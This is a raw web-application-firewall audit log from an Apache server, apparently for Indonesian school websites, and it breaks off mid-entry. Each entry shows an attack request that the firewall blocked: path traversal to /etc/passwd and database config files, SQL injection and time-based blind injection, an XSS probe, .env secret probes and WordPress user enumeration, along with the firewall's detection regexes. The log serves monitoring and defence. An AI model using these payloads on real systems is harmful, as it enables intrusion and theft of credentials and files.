X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Mobile/15E148 Safari/604.1 --d8b6677b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8b6677b-E-- --d8b6677b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594175510729 1485 (- - -) Stopwatch2: 1748594175510729 1485; combined=471, p1=330, p2=112, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8b6677b-Z-- --e0f18873-A-- [30/May/2025:15:36:15 +0700] aDlt_xNBDSvkc-tIZOnr2gAAAEs 103.236.140.4 35324 103.236.140.4 8181 --e0f18873-B-- GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5(999999999)%20as%20id%20from%20HrmResourceManager HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh: Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 --e0f18873-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0f18873-E-- --e0f18873-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 1 UNION SELECT md5(999999999) as id from HrmResourceManager found within MATCHED_VAR: 1 UNION SELECT md5(999999999) as id from HrmResourceManager"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594175510922 1978 (- - -) Stopwatch2: 1748594175510922 1978; combined=1162, p1=242, p2=893, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0f18873-Z-- --fe9f225b-A-- [30/May/2025:15:36:15 +0700] aDlt_7W504ObxUT6RrwCCAAAAAs 103.236.140.4 35314 103.236.140.4 8181 --fe9f225b-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27-- HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fe9f225b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe9f225b-E-- --fe9f225b-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: WAITFOR DELAY found within REQUEST_URI: /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.ReleaseRepMngAction&method=updateDelFlag&TableSelectedID=1%27);WAITFOR+DELAY+%270:0:6%27--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594175509833 3258 (- - -) Stopwatch2: 1748594175509833 3258; combined=1811, p1=423, p2=1361, p3=0, p4=0, p5=27, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe9f225b-Z-- --acea2849-A-- [30/May/2025:15:36:16 +0700] aDluALW504ObxUT6RrwCCgAAAAo 103.236.140.4 35326 103.236.140.4 8181 --acea2849-B-- GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 --acea2849-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --acea2849-E-- --acea2849-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594176460357 2616 (- - -) Stopwatch2: 1748594176460357 2616; combined=668, p1=499, p2=140, p3=0, p4=0, p5=28, sr=93, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --acea2849-Z-- --6aee715b-A-- [30/May/2025:15:36:16 +0700] aDluAIWl_OZMPH_FZ2Da1wAAANY 103.236.140.4 35328 103.236.140.4 8181 --6aee715b-B-- GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded --6aee715b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6aee715b-E-- --6aee715b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /index.php?sl=../../../../../../../etc/passwd%00"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1748594176471496 2058 (- - -) Stopwatch2: 1748594176471496 2058; combined=523, p1=387, p2=110, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6aee715b-Z-- --7ac76b48-A-- [30/May/2025:15:36:21 +0700] aDluBZxu2QkuXt3B9jaf0gAAAJg 103.236.140.4 35348 103.236.140.4 8181 --7ac76b48-B-- POST /sys/ui/extend/varkind/custom.jsp HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 42 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.10 Safari/605.1.15 Accept: */* Content-Type: application/x-www-form-urlencoded --7ac76b48-C-- var={"body":{"file":"file:///etc/passwd"}} --7ac76b48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ac76b48-E-- --7ac76b48-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /sys/ui/extend/varkind/custom.jsp"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594181468106 1817 (- - -) Stopwatch2: 1748594181468106 1817; combined=659, p1=524, p2=102, p3=0, p4=0, p5=33, sr=224, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ac76b48-Z-- --d69ef366-A-- [30/May/2025:15:36:22 +0700] aDluBpxu2QkuXt3B9jaf1QAAAJc 103.236.140.4 35354 103.236.140.4 8181 --d69ef366-B-- GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240 --d69ef366-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d69ef366-E-- --d69ef366-H-- Message: Access denied with code 403 (phase 2). Pattern match ""] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594182472358 2553 (- - -) Stopwatch2: 1748594182472358 2553; combined=1096, p1=407, p2=661, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d69ef366-Z-- --bcf31507-A-- [30/May/2025:15:36:28 +0700] aDluDIWl_OZMPH_FZ2Da2QAAAMw 103.236.140.4 35358 103.236.140.4 8181 --bcf31507-B-- POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 198.252.110.114 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 198.252.110.114 X-Forwarded-Proto: https Connection: close Content-Length: 5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded --bcf31507-C-- "1":1 --bcf31507-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bcf31507-E-- --bcf31507-H-- Message: Access denied with code 403 (phase 2). Matched phrase "config/database.php" at ARGS:picUrl. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: config/database.php found within ARGS:picUrl: ../config/database.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748594188463007 3035 (- - -) Stopwatch2: 1748594188463007 3035; combined=1600, p1=495, p2=1074, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bcf31507-Z-- --8616711f-A-- [30/May/2025:15:44:28 +0700] aDlv7IWl_OZMPH_FZ2Da3AAAANM 103.236.140.4 35408 103.236.140.4 8181 --8616711f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.75.145 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.75.145 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8616711f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8616711f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748594668590026 813 (- - -) Stopwatch2: 1748594668590026 813; combined=345, p1=306, p2=0, p3=0, p4=0, p5=38, sr=94, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8616711f-Z-- --69eb256e-A-- [30/May/2025:16:42:13 +0700] aDl9dUCWxJfHX2QfsdXuhAAAAIE 103.236.140.4 39144 103.236.140.4 8181 --69eb256e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 195.116.155.83 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.116.155.83 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --69eb256e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69eb256e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748598133817907 3011 (- - -) Stopwatch2: 1748598133817907 3011; combined=1738, p1=617, p2=1081, p3=0, p4=0, p5=40, sr=124, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69eb256e-Z-- --a9bb6a63-A-- [30/May/2025:17:39:40 +0700] aDmK7AYacg5Rp_mEAa2rAAAAAEQ 103.236.140.4 52282 103.236.140.4 8181 --a9bb6a63-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.97.201.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.97.201.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a9bb6a63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9bb6a63-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748601580673209 2174 (- - -) Stopwatch2: 1748601580673209 2174; combined=1040, p1=334, p2=678, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9bb6a63-Z-- --4170a61d-A-- [30/May/2025:18:00:00 +0700] aDmPsFIXp1x3knXz7CjOwgAAAAg 103.236.140.4 53798 103.236.140.4 8181 --4170a61d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 35.240.174.82 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 35.240.174.82 X-Forwarded-Proto: https Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --4170a61d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4170a61d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748602800366920 883 (- - -) Stopwatch2: 1748602800366920 883; combined=356, p1=315, p2=0, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4170a61d-Z-- --6a3cda5d-A-- [30/May/2025:18:24:24 +0700] aDmVaECWxJfHX2QfsdX3gQAAAIg 103.236.140.4 56674 103.236.140.4 8181 --6a3cda5d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 64.227.161.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 64.227.161.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6a3cda5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a3cda5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748604264929081 2489 (- - -) Stopwatch2: 1748604264929081 2489; combined=1357, p1=438, p2=887, p3=0, p4=0, p5=32, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6a3cda5d-Z-- --be447066-A-- [30/May/2025:19:06:44 +0700] aDmfVHC_Owo8zPtYGR1SGgAAAMo 103.236.140.4 59502 103.236.140.4 8181 --be447066-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 206.189.19.19 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 206.189.19.19 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --be447066-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be447066-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748606804969007 713 (- - -) Stopwatch2: 1748606804969007 713; combined=275, p1=240, p2=0, p3=0, p4=0, p5=35, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be447066-Z-- --296bef7b-A-- [30/May/2025:19:15:10 +0700] aDmhTnC_Owo8zPtYGR1SRQAAAMo 103.236.140.4 60078 103.236.140.4 8181 --296bef7b-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 165.227.84.14 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 165.227.84.14 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --296bef7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --296bef7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748607310224338 826 (- - -) Stopwatch2: 1748607310224338 826; combined=301, p1=272, p2=0, p3=0, p4=0, p5=29, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --296bef7b-Z-- --a237782b-A-- [30/May/2025:19:42:34 +0700] aDmnulIXp1x3knXz7CjQ7QAAAAI 103.236.140.4 33614 103.236.140.4 8181 --a237782b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --a237782b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a237782b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748608954202709 775 (- - -) Stopwatch2: 1748608954202709 775; combined=318, p1=280, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a237782b-Z-- --f25abf7a-A-- [30/May/2025:19:42:36 +0700] aDmnvFIXp1x3knXz7CjQ7wAAAAw 103.236.140.4 33620 103.236.140.4 8181 --f25abf7a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.116.155 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.116.155 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f25abf7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f25abf7a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748608956979681 713 (- - -) Stopwatch2: 1748608956979681 713; combined=292, p1=256, p2=0, p3=0, p4=0, p5=36, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f25abf7a-Z-- --28d0e469-A-- [30/May/2025:19:53:34 +0700] aDmqTlIXp1x3knXz7CjRuwAAABY 103.236.140.4 35300 103.236.140.4 8181 --28d0e469-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 94.26.57.91 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 94.26.57.91 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 